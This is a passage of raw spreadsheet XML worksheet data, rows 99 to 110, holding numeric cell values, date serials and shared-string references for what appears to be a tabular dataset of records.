        <v>0</v>
      </c>
      <c r="Z99">
        <v>0</v>
      </c>
      <c r="AA99">
        <v>0</v>
      </c>
      <c r="AB99">
        <v>100</v>
      </c>
      <c r="AC99">
        <v>0</v>
      </c>
      <c r="AD99">
        <v>0</v>
      </c>
      <c r="AE99">
        <v>0</v>
      </c>
      <c r="AF99" t="s">
        <v>918</v>
      </c>
      <c r="AG99">
        <v>55585</v>
      </c>
      <c r="AH99">
        <v>15</v>
      </c>
      <c r="AJ99">
        <v>226</v>
      </c>
      <c r="AK99" t="s">
        <v>919</v>
      </c>
      <c r="AL99" t="s">
        <v>920</v>
      </c>
      <c r="AM99" t="s">
        <v>921</v>
      </c>
      <c r="AN99" t="s">
        <v>68</v>
      </c>
      <c r="AO99">
        <v>2012</v>
      </c>
      <c r="AP99">
        <v>85729292634</v>
      </c>
      <c r="AQ99" t="s">
        <v>922</v>
      </c>
      <c r="AR99" t="s">
        <v>918</v>
      </c>
      <c r="AS99" t="s">
        <v>71</v>
      </c>
      <c r="AT99" t="s">
        <v>72</v>
      </c>
      <c r="AU99">
        <v>6</v>
      </c>
      <c r="AV99">
        <v>1</v>
      </c>
      <c r="AW99">
        <v>0</v>
      </c>
      <c r="AX99">
        <v>0</v>
      </c>
      <c r="AY99">
        <v>0</v>
      </c>
      <c r="AZ99">
        <v>6</v>
      </c>
      <c r="BA99" t="s">
        <v>17159</v>
      </c>
      <c r="BB99" t="s">
        <v>16705</v>
      </c>
      <c r="BC99" t="s">
        <v>10897</v>
      </c>
      <c r="BD99">
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>333</v>
      </c>
      <c r="B100" t="s">
        <v>923</v>
      </c>
      <c r="C100" t="s">
        <v>224</v>
      </c>
      <c r="D100" t="s">
        <v>924</v>
      </c>
      <c r="E100" t="s">
        <v>142</v>
      </c>
      <c r="F100" t="s">
        <v>925</v>
      </c>
      <c r="G100" s="1">
        <v>43916</v>
      </c>
      <c r="H100">
        <v>2715</v>
      </c>
      <c r="I100">
        <v>2715</v>
      </c>
      <c r="J100">
        <v>1</v>
      </c>
      <c r="K100">
        <v>0</v>
      </c>
      <c r="L100">
        <v>0</v>
      </c>
      <c r="M100">
        <v>0</v>
      </c>
      <c r="N100">
        <v>0</v>
      </c>
      <c r="O100">
        <v>0</v>
      </c>
      <c r="P100">
        <v>0</v>
      </c>
      <c r="Q100">
        <v>0</v>
      </c>
      <c r="R100">
        <v>0</v>
      </c>
      <c r="S100">
        <v>1</v>
      </c>
      <c r="T100">
        <v>0</v>
      </c>
      <c r="U100">
        <v>5000</v>
      </c>
      <c r="V100">
        <v>0</v>
      </c>
      <c r="W100">
        <v>0</v>
      </c>
      <c r="X100">
        <v>0</v>
      </c>
      <c r="Y100">
        <v>0</v>
      </c>
      <c r="Z100">
        <v>0</v>
      </c>
      <c r="AA100">
        <v>0</v>
      </c>
      <c r="AB100">
        <v>0</v>
      </c>
      <c r="AC100">
        <v>0</v>
      </c>
      <c r="AD100">
        <v>1</v>
      </c>
      <c r="AE100">
        <v>0</v>
      </c>
      <c r="AF100" t="s">
        <v>926</v>
      </c>
      <c r="AG100">
        <v>55171</v>
      </c>
      <c r="AH100">
        <v>15</v>
      </c>
      <c r="AJ100">
        <v>227</v>
      </c>
      <c r="AK100" t="s">
        <v>927</v>
      </c>
      <c r="AL100" t="s">
        <v>928</v>
      </c>
      <c r="AM100" t="s">
        <v>929</v>
      </c>
      <c r="AN100" t="s">
        <v>55</v>
      </c>
      <c r="AO100">
        <v>2014</v>
      </c>
      <c r="AP100">
        <v>274373861</v>
      </c>
      <c r="AQ100" t="s">
        <v>930</v>
      </c>
      <c r="AR100" t="s">
        <v>931</v>
      </c>
      <c r="AS100" t="s">
        <v>179</v>
      </c>
      <c r="AT100" t="s">
        <v>58</v>
      </c>
      <c r="AU100">
        <v>7</v>
      </c>
      <c r="AV100">
        <v>0</v>
      </c>
      <c r="AW100">
        <v>5</v>
      </c>
      <c r="AX100">
        <v>1</v>
      </c>
      <c r="AY100">
        <v>3</v>
      </c>
      <c r="AZ100">
        <v>1</v>
      </c>
      <c r="BA100" t="s">
        <v>17225</v>
      </c>
      <c r="BB100" t="s">
        <v>14488</v>
      </c>
      <c r="BC100">
        <v>0</v>
      </c>
      <c r="BD100">
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>509</v>
      </c>
      <c r="B101" t="s">
        <v>932</v>
      </c>
      <c r="C101" t="s">
        <v>318</v>
      </c>
      <c r="D101" t="s">
        <v>933</v>
      </c>
      <c r="E101" t="s">
        <v>111</v>
      </c>
      <c r="F101" t="s">
        <v>934</v>
      </c>
      <c r="G101" s="1">
        <v>43906</v>
      </c>
      <c r="H101">
        <v>2778</v>
      </c>
      <c r="I101">
        <v>2778</v>
      </c>
      <c r="J101">
        <v>1</v>
      </c>
      <c r="K101">
        <v>2</v>
      </c>
      <c r="L101">
        <v>2</v>
      </c>
      <c r="M101">
        <v>1</v>
      </c>
      <c r="N101">
        <v>5000</v>
      </c>
      <c r="O101">
        <v>0</v>
      </c>
      <c r="P101">
        <v>0</v>
      </c>
      <c r="Q101">
        <v>3</v>
      </c>
      <c r="R101">
        <v>6</v>
      </c>
      <c r="S101">
        <v>0</v>
      </c>
      <c r="T101">
        <v>1</v>
      </c>
      <c r="U101">
        <v>600000</v>
      </c>
      <c r="V101">
        <v>10000</v>
      </c>
      <c r="W101">
        <v>10000</v>
      </c>
      <c r="X101">
        <v>1000</v>
      </c>
      <c r="Y101">
        <v>0</v>
      </c>
      <c r="Z101">
        <v>0</v>
      </c>
      <c r="AA101">
        <v>0</v>
      </c>
      <c r="AB101">
        <v>1200</v>
      </c>
      <c r="AC101">
        <v>180000</v>
      </c>
      <c r="AD101">
        <v>0</v>
      </c>
      <c r="AE101">
        <v>10000</v>
      </c>
      <c r="AF101" t="s">
        <v>935</v>
      </c>
      <c r="AG101">
        <v>90242</v>
      </c>
      <c r="AH101">
        <v>26</v>
      </c>
      <c r="AJ101">
        <v>420</v>
      </c>
      <c r="AK101" t="s">
        <v>936</v>
      </c>
      <c r="AL101" t="s">
        <v>937</v>
      </c>
      <c r="AM101" t="s">
        <v>938</v>
      </c>
      <c r="AN101" t="s">
        <v>68</v>
      </c>
      <c r="AO101">
        <v>2005</v>
      </c>
      <c r="AP101" t="s">
        <v>939</v>
      </c>
      <c r="AQ101" t="s">
        <v>940</v>
      </c>
      <c r="AR101" t="s">
        <v>941</v>
      </c>
      <c r="AS101" t="s">
        <v>71</v>
      </c>
      <c r="AT101" t="s">
        <v>58</v>
      </c>
      <c r="AU101">
        <v>25</v>
      </c>
      <c r="AV101">
        <v>1</v>
      </c>
      <c r="AW101">
        <v>10</v>
      </c>
      <c r="AX101">
        <v>10</v>
      </c>
      <c r="AY101">
        <v>14</v>
      </c>
      <c r="AZ101">
        <v>33</v>
      </c>
      <c r="BA101" t="s">
        <v>17287</v>
      </c>
      <c r="BB101" t="s">
        <v>14630</v>
      </c>
      <c r="BC101" t="s">
        <v>9693</v>
      </c>
      <c r="BD101" t="s">
        <v>10657</v>
      </c>
    </row>
    <row r="102" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>390</v>
      </c>
      <c r="B102" t="s">
        <v>942</v>
      </c>
      <c r="C102" t="s">
        <v>157</v>
      </c>
      <c r="D102" t="s">
        <v>943</v>
      </c>
      <c r="E102" t="s">
        <v>944</v>
      </c>
      <c r="F102" t="s">
        <v>945</v>
      </c>
      <c r="G102" s="1">
        <v>43945</v>
      </c>
      <c r="H102">
        <v>2787</v>
      </c>
      <c r="I102">
        <v>2787</v>
      </c>
      <c r="J102">
        <v>1</v>
      </c>
      <c r="K102">
        <v>2</v>
      </c>
      <c r="L102">
        <v>0</v>
      </c>
      <c r="M102">
        <v>0</v>
      </c>
      <c r="N102">
        <v>0</v>
      </c>
      <c r="O102">
        <v>0</v>
      </c>
      <c r="P102">
        <v>8</v>
      </c>
      <c r="Q102">
        <v>60</v>
      </c>
      <c r="R102">
        <v>0</v>
      </c>
      <c r="S102">
        <v>8</v>
      </c>
      <c r="T102">
        <v>2</v>
      </c>
      <c r="U102">
        <v>2500000</v>
      </c>
      <c r="V102">
        <v>3000</v>
      </c>
      <c r="W102">
        <v>0</v>
      </c>
      <c r="X102">
        <v>0</v>
      </c>
      <c r="Y102">
        <v>0</v>
      </c>
      <c r="Z102">
        <v>0</v>
      </c>
      <c r="AA102">
        <v>90000</v>
      </c>
      <c r="AB102">
        <v>60000</v>
      </c>
      <c r="AC102">
        <v>0</v>
      </c>
      <c r="AD102">
        <v>80000</v>
      </c>
      <c r="AE102">
        <v>1080000</v>
      </c>
      <c r="AF102" t="s">
        <v>946</v>
      </c>
      <c r="AG102">
        <v>67156</v>
      </c>
      <c r="AH102">
        <v>16</v>
      </c>
      <c r="AJ102">
        <v>241</v>
      </c>
      <c r="AK102" t="s">
        <v>947</v>
      </c>
      <c r="AL102" t="s">
        <v>948</v>
      </c>
      <c r="AM102" t="s">
        <v>949</v>
      </c>
      <c r="AN102" t="s">
        <v>82</v>
      </c>
      <c r="AO102">
        <v>2014</v>
      </c>
      <c r="AP102" t="s">
        <v>950</v>
      </c>
      <c r="AQ102" t="s">
        <v>951</v>
      </c>
      <c r="AR102" t="s">
        <v>952</v>
      </c>
      <c r="AU102">
        <v>25</v>
      </c>
      <c r="AV102">
        <v>2</v>
      </c>
      <c r="AW102">
        <v>252</v>
      </c>
      <c r="AX102">
        <v>461</v>
      </c>
      <c r="AY102">
        <v>33</v>
      </c>
      <c r="AZ102">
        <v>29</v>
      </c>
      <c r="BA102" t="s">
        <v>16652</v>
      </c>
      <c r="BB102" t="s">
        <v>14537</v>
      </c>
      <c r="BC102">
        <v>0</v>
      </c>
      <c r="BD102" t="s">
        <v>10727</v>
      </c>
    </row>
    <row r="103" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>318</v>
      </c>
      <c r="B103" t="s">
        <v>953</v>
      </c>
      <c r="C103" t="s">
        <v>790</v>
      </c>
      <c r="D103" t="s">
        <v>954</v>
      </c>
      <c r="E103" t="s">
        <v>111</v>
      </c>
      <c r="F103" t="s">
        <v>955</v>
      </c>
      <c r="G103" s="1">
        <v>43969</v>
      </c>
      <c r="H103">
        <v>2811</v>
      </c>
      <c r="I103">
        <v>2811</v>
      </c>
      <c r="J103">
        <v>3</v>
      </c>
      <c r="K103">
        <v>1</v>
      </c>
      <c r="L103">
        <v>3</v>
      </c>
      <c r="M103">
        <v>0</v>
      </c>
      <c r="N103">
        <v>0</v>
      </c>
      <c r="O103">
        <v>0</v>
      </c>
      <c r="P103">
        <v>0</v>
      </c>
      <c r="Q103">
        <v>0</v>
      </c>
      <c r="R103">
        <v>3</v>
      </c>
      <c r="S103">
        <v>1</v>
      </c>
      <c r="T103">
        <v>0</v>
      </c>
      <c r="U103">
        <v>10000</v>
      </c>
      <c r="V103">
        <v>10000</v>
      </c>
      <c r="W103">
        <v>10000</v>
      </c>
      <c r="X103">
        <v>0</v>
      </c>
      <c r="Y103">
        <v>0</v>
      </c>
      <c r="Z103">
        <v>0</v>
      </c>
      <c r="AA103">
        <v>0</v>
      </c>
      <c r="AB103">
        <v>0</v>
      </c>
      <c r="AC103">
        <v>3000</v>
      </c>
      <c r="AD103">
        <v>1</v>
      </c>
      <c r="AE103">
        <v>0</v>
      </c>
      <c r="AF103" t="s">
        <v>956</v>
      </c>
      <c r="AG103">
        <v>93700</v>
      </c>
      <c r="AH103">
        <v>27</v>
      </c>
      <c r="AJ103">
        <v>423</v>
      </c>
      <c r="AK103" t="s">
        <v>957</v>
      </c>
      <c r="AL103" t="s">
        <v>958</v>
      </c>
      <c r="AM103" t="s">
        <v>959</v>
      </c>
      <c r="AN103" t="s">
        <v>55</v>
      </c>
      <c r="AO103">
        <v>1997</v>
      </c>
      <c r="AP103">
        <v>81322198917</v>
      </c>
      <c r="AQ103" t="s">
        <v>960</v>
      </c>
      <c r="AR103" t="s">
        <v>961</v>
      </c>
      <c r="AS103" t="s">
        <v>71</v>
      </c>
      <c r="AT103" t="s">
        <v>58</v>
      </c>
      <c r="AU103">
        <v>25</v>
      </c>
      <c r="AV103">
        <v>0</v>
      </c>
      <c r="AW103">
        <v>64</v>
      </c>
      <c r="AX103">
        <v>3</v>
      </c>
      <c r="AY103">
        <v>13</v>
      </c>
      <c r="AZ103">
        <v>4</v>
      </c>
      <c r="BA103" t="s">
        <v>16666</v>
      </c>
      <c r="BB103" t="s">
        <v>14477</v>
      </c>
      <c r="BC103" t="s">
        <v>9550</v>
      </c>
      <c r="BD103">
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>756</v>
      </c>
      <c r="B104" t="s">
        <v>962</v>
      </c>
      <c r="C104" t="s">
        <v>458</v>
      </c>
      <c r="D104" t="s">
        <v>963</v>
      </c>
      <c r="E104" t="s">
        <v>843</v>
      </c>
      <c r="F104" t="s">
        <v>859</v>
      </c>
      <c r="G104" s="1">
        <v>43949</v>
      </c>
      <c r="H104">
        <v>2825</v>
      </c>
      <c r="I104">
        <v>2825</v>
      </c>
      <c r="J104">
        <v>0</v>
      </c>
      <c r="K104">
        <v>0</v>
      </c>
      <c r="L104">
        <v>0</v>
      </c>
      <c r="M104">
        <v>0</v>
      </c>
      <c r="N104">
        <v>0</v>
      </c>
      <c r="O104">
        <v>0</v>
      </c>
      <c r="P104">
        <v>0</v>
      </c>
      <c r="Q104">
        <v>10</v>
      </c>
      <c r="R104">
        <v>20</v>
      </c>
      <c r="S104">
        <v>1</v>
      </c>
      <c r="T104">
        <v>1</v>
      </c>
      <c r="U104">
        <v>0</v>
      </c>
      <c r="V104">
        <v>0</v>
      </c>
      <c r="W104">
        <v>0</v>
      </c>
      <c r="X104">
        <v>0</v>
      </c>
      <c r="Y104">
        <v>0</v>
      </c>
      <c r="Z104">
        <v>0</v>
      </c>
      <c r="AA104">
        <v>0</v>
      </c>
      <c r="AB104">
        <v>200</v>
      </c>
      <c r="AC104">
        <v>200</v>
      </c>
      <c r="AD104">
        <v>1</v>
      </c>
      <c r="AE104">
        <v>2500</v>
      </c>
      <c r="AF104" t="s">
        <v>962</v>
      </c>
      <c r="AG104">
        <v>29111</v>
      </c>
      <c r="AH104">
        <v>5</v>
      </c>
      <c r="AJ104">
        <v>154</v>
      </c>
      <c r="AK104" t="s">
        <v>964</v>
      </c>
      <c r="AL104" t="s">
        <v>964</v>
      </c>
      <c r="AM104" t="s">
        <v>965</v>
      </c>
      <c r="AN104" t="s">
        <v>68</v>
      </c>
      <c r="AO104">
        <v>2011</v>
      </c>
      <c r="AP104">
        <v>82366663333</v>
      </c>
      <c r="AQ104" t="s">
        <v>966</v>
      </c>
      <c r="AR104" t="s">
        <v>962</v>
      </c>
      <c r="AS104" t="s">
        <v>71</v>
      </c>
      <c r="AT104" t="s">
        <v>72</v>
      </c>
      <c r="AU104">
        <v>25</v>
      </c>
      <c r="AV104">
        <v>1</v>
      </c>
      <c r="AW104">
        <v>1</v>
      </c>
      <c r="AX104">
        <v>0</v>
      </c>
      <c r="AY104">
        <v>4</v>
      </c>
      <c r="AZ104">
        <v>0</v>
      </c>
      <c r="BA104" t="s">
        <v>17293</v>
      </c>
      <c r="BB104" t="s">
        <v>14829</v>
      </c>
      <c r="BC104" t="s">
        <v>9638</v>
      </c>
      <c r="BD104" t="s">
        <v>10754</v>
      </c>
    </row>
    <row r="105" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>512</v>
      </c>
      <c r="B105" t="s">
        <v>967</v>
      </c>
      <c r="C105" t="s">
        <v>215</v>
      </c>
      <c r="D105" t="s">
        <v>968</v>
      </c>
      <c r="E105" t="s">
        <v>142</v>
      </c>
      <c r="F105" t="s">
        <v>969</v>
      </c>
      <c r="G105" s="1">
        <v>44307</v>
      </c>
      <c r="H105">
        <v>2829</v>
      </c>
      <c r="I105">
        <v>2829</v>
      </c>
      <c r="J105">
        <v>0</v>
      </c>
      <c r="K105">
        <v>0</v>
      </c>
      <c r="L105">
        <v>2</v>
      </c>
      <c r="M105">
        <v>0</v>
      </c>
      <c r="N105">
        <v>0</v>
      </c>
      <c r="O105">
        <v>0</v>
      </c>
      <c r="P105">
        <v>0</v>
      </c>
      <c r="Q105">
        <v>0</v>
      </c>
      <c r="R105">
        <v>2</v>
      </c>
      <c r="S105">
        <v>0</v>
      </c>
      <c r="T105">
        <v>0</v>
      </c>
      <c r="U105">
        <v>0</v>
      </c>
      <c r="V105">
        <v>0</v>
      </c>
      <c r="W105">
        <v>5000</v>
      </c>
      <c r="X105">
        <v>0</v>
      </c>
      <c r="Y105">
        <v>0</v>
      </c>
      <c r="Z105">
        <v>0</v>
      </c>
      <c r="AA105">
        <v>0</v>
      </c>
      <c r="AB105">
        <v>0</v>
      </c>
      <c r="AC105">
        <v>180000</v>
      </c>
      <c r="AD105">
        <v>0</v>
      </c>
      <c r="AE105">
        <v>0</v>
      </c>
      <c r="AF105" t="s">
        <v>970</v>
      </c>
      <c r="AG105">
        <v>33411</v>
      </c>
      <c r="AH105">
        <v>6</v>
      </c>
      <c r="AJ105">
        <v>142</v>
      </c>
      <c r="AK105" t="s">
        <v>219</v>
      </c>
      <c r="AL105" t="s">
        <v>220</v>
      </c>
      <c r="AM105" t="s">
        <v>971</v>
      </c>
      <c r="AN105" t="s">
        <v>55</v>
      </c>
      <c r="AO105">
        <v>2001</v>
      </c>
      <c r="AP105" t="s">
        <v>972</v>
      </c>
      <c r="AQ105" t="s">
        <v>973</v>
      </c>
      <c r="AR105" t="s">
        <v>974</v>
      </c>
      <c r="AS105" t="s">
        <v>71</v>
      </c>
      <c r="AT105" t="s">
        <v>58</v>
      </c>
      <c r="AU105">
        <v>26</v>
      </c>
      <c r="AV105">
        <v>0</v>
      </c>
      <c r="AW105">
        <v>3</v>
      </c>
      <c r="AX105">
        <v>3</v>
      </c>
      <c r="AY105">
        <v>8</v>
      </c>
      <c r="AZ105">
        <v>9</v>
      </c>
      <c r="BA105" t="s">
        <v>17294</v>
      </c>
      <c r="BB105" t="s">
        <v>14633</v>
      </c>
      <c r="BC105" t="s">
        <v>9550</v>
      </c>
      <c r="BD105" t="s">
        <v>9494</v>
      </c>
    </row>
    <row r="106" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>593</v>
      </c>
      <c r="B106" t="s">
        <v>975</v>
      </c>
      <c r="C106" t="s">
        <v>157</v>
      </c>
      <c r="D106" t="s">
        <v>976</v>
      </c>
      <c r="E106" t="s">
        <v>142</v>
      </c>
      <c r="F106" t="s">
        <v>666</v>
      </c>
      <c r="G106" s="1">
        <v>44000</v>
      </c>
      <c r="H106">
        <v>2836</v>
      </c>
      <c r="I106">
        <v>2836</v>
      </c>
      <c r="J106">
        <v>1</v>
      </c>
      <c r="K106">
        <v>0</v>
      </c>
      <c r="L106">
        <v>0</v>
      </c>
      <c r="M106">
        <v>0</v>
      </c>
      <c r="N106">
        <v>0</v>
      </c>
      <c r="O106">
        <v>0</v>
      </c>
      <c r="P106">
        <v>0</v>
      </c>
      <c r="Q106">
        <v>0</v>
      </c>
      <c r="R106">
        <v>0</v>
      </c>
      <c r="S106">
        <v>0</v>
      </c>
      <c r="T106">
        <v>0</v>
      </c>
      <c r="U106">
        <v>400000</v>
      </c>
      <c r="V106">
        <v>0</v>
      </c>
      <c r="W106">
        <v>0</v>
      </c>
      <c r="X106">
        <v>0</v>
      </c>
      <c r="Y106">
        <v>0</v>
      </c>
      <c r="Z106">
        <v>0</v>
      </c>
      <c r="AA106">
        <v>0</v>
      </c>
      <c r="AB106">
        <v>0</v>
      </c>
      <c r="AC106">
        <v>0</v>
      </c>
      <c r="AD106">
        <v>0</v>
      </c>
      <c r="AE106">
        <v>0</v>
      </c>
      <c r="AF106" t="s">
        <v>977</v>
      </c>
      <c r="AG106">
        <v>61252</v>
      </c>
      <c r="AH106">
        <v>16</v>
      </c>
      <c r="AJ106">
        <v>242</v>
      </c>
      <c r="AK106" t="s">
        <v>706</v>
      </c>
      <c r="AL106" t="s">
        <v>978</v>
      </c>
      <c r="AM106" t="s">
        <v>979</v>
      </c>
      <c r="AN106" t="s">
        <v>55</v>
      </c>
      <c r="AO106">
        <v>2016</v>
      </c>
      <c r="AP106" t="s">
        <v>980</v>
      </c>
      <c r="AQ106" t="s">
        <v>981</v>
      </c>
      <c r="AR106" t="s">
        <v>977</v>
      </c>
      <c r="AS106" t="s">
        <v>371</v>
      </c>
      <c r="AT106" t="s">
        <v>72</v>
      </c>
      <c r="AU106">
        <v>26</v>
      </c>
      <c r="AV106">
        <v>1</v>
      </c>
      <c r="AW106">
        <v>6</v>
      </c>
      <c r="AX106">
        <v>0</v>
      </c>
      <c r="AY106">
        <v>4</v>
      </c>
      <c r="AZ106">
        <v>2</v>
      </c>
      <c r="BA106" t="s">
        <v>16721</v>
      </c>
      <c r="BB106" t="s">
        <v>14703</v>
      </c>
      <c r="BC106" t="s">
        <v>10671</v>
      </c>
      <c r="BD106">
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>532</v>
      </c>
      <c r="B107" t="s">
        <v>982</v>
      </c>
      <c r="C107" t="s">
        <v>99</v>
      </c>
      <c r="D107" t="s">
        <v>983</v>
      </c>
      <c r="E107" t="s">
        <v>984</v>
      </c>
      <c r="F107" t="s">
        <v>985</v>
      </c>
      <c r="G107" s="1">
        <v>43949</v>
      </c>
      <c r="H107">
        <v>2850</v>
      </c>
      <c r="I107">
        <v>2850</v>
      </c>
      <c r="J107">
        <v>3</v>
      </c>
      <c r="K107">
        <v>1</v>
      </c>
      <c r="L107">
        <v>1</v>
      </c>
      <c r="M107">
        <v>0</v>
      </c>
      <c r="N107">
        <v>0</v>
      </c>
      <c r="O107">
        <v>0</v>
      </c>
      <c r="P107">
        <v>0</v>
      </c>
      <c r="Q107">
        <v>0</v>
      </c>
      <c r="R107">
        <v>0</v>
      </c>
      <c r="S107">
        <v>0</v>
      </c>
      <c r="T107">
        <v>1</v>
      </c>
      <c r="U107">
        <v>280000</v>
      </c>
      <c r="V107">
        <v>8000</v>
      </c>
      <c r="W107">
        <v>4500</v>
      </c>
      <c r="X107">
        <v>0</v>
      </c>
      <c r="Y107">
        <v>0</v>
      </c>
      <c r="Z107">
        <v>0</v>
      </c>
      <c r="AA107">
        <v>0</v>
      </c>
      <c r="AB107">
        <v>0</v>
      </c>
      <c r="AC107">
        <v>0</v>
      </c>
      <c r="AD107">
        <v>0</v>
      </c>
      <c r="AE107">
        <v>1000</v>
      </c>
      <c r="AF107" t="s">
        <v>986</v>
      </c>
      <c r="AG107">
        <v>14430</v>
      </c>
      <c r="AH107">
        <v>12</v>
      </c>
      <c r="AJ107">
        <v>160</v>
      </c>
      <c r="AK107" t="s">
        <v>987</v>
      </c>
      <c r="AL107" t="s">
        <v>988</v>
      </c>
      <c r="AM107" t="s">
        <v>989</v>
      </c>
      <c r="AN107" t="s">
        <v>55</v>
      </c>
      <c r="AO107">
        <v>2000</v>
      </c>
      <c r="AP107" t="s">
        <v>990</v>
      </c>
      <c r="AQ107" t="s">
        <v>991</v>
      </c>
      <c r="AR107" t="s">
        <v>986</v>
      </c>
      <c r="AU107">
        <v>26</v>
      </c>
      <c r="AV107">
        <v>1</v>
      </c>
      <c r="AW107">
        <v>28</v>
      </c>
      <c r="AX107">
        <v>4</v>
      </c>
      <c r="AY107">
        <v>11</v>
      </c>
      <c r="AZ107">
        <v>8</v>
      </c>
      <c r="BA107" t="s">
        <v>16713</v>
      </c>
      <c r="BB107" t="s">
        <v>14650</v>
      </c>
      <c r="BC107" t="s">
        <v>9550</v>
      </c>
      <c r="BD107" t="s">
        <v>10679</v>
      </c>
    </row>
    <row r="108" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>160</v>
      </c>
      <c r="B108" t="s">
        <v>992</v>
      </c>
      <c r="C108" t="s">
        <v>790</v>
      </c>
      <c r="D108" t="s">
        <v>993</v>
      </c>
      <c r="E108" t="s">
        <v>142</v>
      </c>
      <c r="F108" t="s">
        <v>994</v>
      </c>
      <c r="G108" s="1">
        <v>44075</v>
      </c>
      <c r="H108">
        <v>2881</v>
      </c>
      <c r="I108">
        <v>2881</v>
      </c>
      <c r="J108">
        <v>2</v>
      </c>
      <c r="K108">
        <v>0</v>
      </c>
      <c r="L108">
        <v>2</v>
      </c>
      <c r="M108">
        <v>0</v>
      </c>
      <c r="N108">
        <v>0</v>
      </c>
      <c r="O108">
        <v>0</v>
      </c>
      <c r="P108">
        <v>0</v>
      </c>
      <c r="Q108">
        <v>0</v>
      </c>
      <c r="R108">
        <v>0</v>
      </c>
      <c r="S108">
        <v>0</v>
      </c>
      <c r="T108">
        <v>0</v>
      </c>
      <c r="U108">
        <v>150</v>
      </c>
      <c r="V108">
        <v>0</v>
      </c>
      <c r="W108">
        <v>8</v>
      </c>
      <c r="X108">
        <v>0</v>
      </c>
      <c r="Y108">
        <v>0</v>
      </c>
      <c r="Z108">
        <v>0</v>
      </c>
      <c r="AA108">
        <v>0</v>
      </c>
      <c r="AB108">
        <v>0</v>
      </c>
      <c r="AC108">
        <v>0</v>
      </c>
      <c r="AD108">
        <v>0</v>
      </c>
      <c r="AE108">
        <v>0</v>
      </c>
      <c r="AF108" t="s">
        <v>992</v>
      </c>
      <c r="AG108">
        <v>93234</v>
      </c>
      <c r="AH108">
        <v>27</v>
      </c>
      <c r="AJ108">
        <v>438</v>
      </c>
      <c r="AK108" t="s">
        <v>793</v>
      </c>
      <c r="AL108" t="s">
        <v>794</v>
      </c>
      <c r="AM108" t="s">
        <v>995</v>
      </c>
      <c r="AN108" t="s">
        <v>55</v>
      </c>
      <c r="AO108">
        <v>2017</v>
      </c>
      <c r="AP108">
        <v>8114002875</v>
      </c>
      <c r="AQ108" t="s">
        <v>996</v>
      </c>
      <c r="AR108" t="s">
        <v>997</v>
      </c>
      <c r="AS108" t="s">
        <v>71</v>
      </c>
      <c r="AT108" t="s">
        <v>58</v>
      </c>
      <c r="AU108">
        <v>26</v>
      </c>
      <c r="AV108">
        <v>0</v>
      </c>
      <c r="AW108">
        <v>2</v>
      </c>
      <c r="AX108">
        <v>8</v>
      </c>
      <c r="AY108">
        <v>9</v>
      </c>
      <c r="AZ108">
        <v>10</v>
      </c>
      <c r="BA108" t="s">
        <v>16623</v>
      </c>
      <c r="BB108" t="s">
        <v>14348</v>
      </c>
      <c r="BC108">
        <v>0</v>
      </c>
      <c r="BD108">
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>758</v>
      </c>
      <c r="B109" t="s">
        <v>998</v>
      </c>
      <c r="C109" t="s">
        <v>999</v>
      </c>
      <c r="D109" t="s">
        <v>1000</v>
      </c>
      <c r="E109" t="s">
        <v>1001</v>
      </c>
      <c r="F109" t="s">
        <v>1002</v>
      </c>
      <c r="G109" s="1">
        <v>44075</v>
      </c>
      <c r="H109">
        <v>2888</v>
      </c>
      <c r="I109">
        <v>2888</v>
      </c>
      <c r="J109">
        <v>3</v>
      </c>
      <c r="K109">
        <v>1</v>
      </c>
      <c r="L109">
        <v>3</v>
      </c>
      <c r="M109">
        <v>0</v>
      </c>
      <c r="N109">
        <v>0</v>
      </c>
      <c r="O109">
        <v>0</v>
      </c>
      <c r="P109">
        <v>0</v>
      </c>
      <c r="Q109">
        <v>1</v>
      </c>
      <c r="R109">
        <v>6</v>
      </c>
      <c r="S109">
        <v>1</v>
      </c>
      <c r="T109">
        <v>0</v>
      </c>
      <c r="U109">
        <v>9000</v>
      </c>
      <c r="V109">
        <v>1</v>
      </c>
      <c r="W109">
        <v>9000</v>
      </c>
      <c r="X109">
        <v>0</v>
      </c>
      <c r="Y109">
        <v>0</v>
      </c>
      <c r="Z109">
        <v>0</v>
      </c>
      <c r="AA109">
        <v>0</v>
      </c>
      <c r="AB109">
        <v>200</v>
      </c>
      <c r="AC109">
        <v>2400</v>
      </c>
      <c r="AD109">
        <v>1</v>
      </c>
      <c r="AE109">
        <v>0</v>
      </c>
      <c r="AF109" t="s">
        <v>1003</v>
      </c>
      <c r="AG109">
        <v>91452</v>
      </c>
      <c r="AH109">
        <v>30</v>
      </c>
      <c r="AJ109">
        <v>446</v>
      </c>
      <c r="AK109" t="s">
        <v>1004</v>
      </c>
      <c r="AL109" t="s">
        <v>1005</v>
      </c>
      <c r="AM109" t="s">
        <v>1006</v>
      </c>
      <c r="AN109" t="s">
        <v>68</v>
      </c>
      <c r="AO109">
        <v>2017</v>
      </c>
      <c r="AP109" t="s">
        <v>1007</v>
      </c>
      <c r="AQ109" t="s">
        <v>1008</v>
      </c>
      <c r="AR109" t="s">
        <v>1003</v>
      </c>
      <c r="AS109" t="s">
        <v>371</v>
      </c>
      <c r="AT109" t="s">
        <v>58</v>
      </c>
      <c r="AU109">
        <v>25</v>
      </c>
      <c r="AV109">
        <v>1</v>
      </c>
      <c r="AW109">
        <v>1</v>
      </c>
      <c r="AX109">
        <v>15</v>
      </c>
      <c r="AY109">
        <v>8</v>
      </c>
      <c r="AZ109">
        <v>1</v>
      </c>
      <c r="BA109" t="s">
        <v>17312</v>
      </c>
      <c r="BB109" t="s">
        <v>14830</v>
      </c>
      <c r="BC109">
        <v>0</v>
      </c>
      <c r="BD109" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="110" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>244</v>
      </c>
      <c r="B110" t="s">
        <v>1009</v>
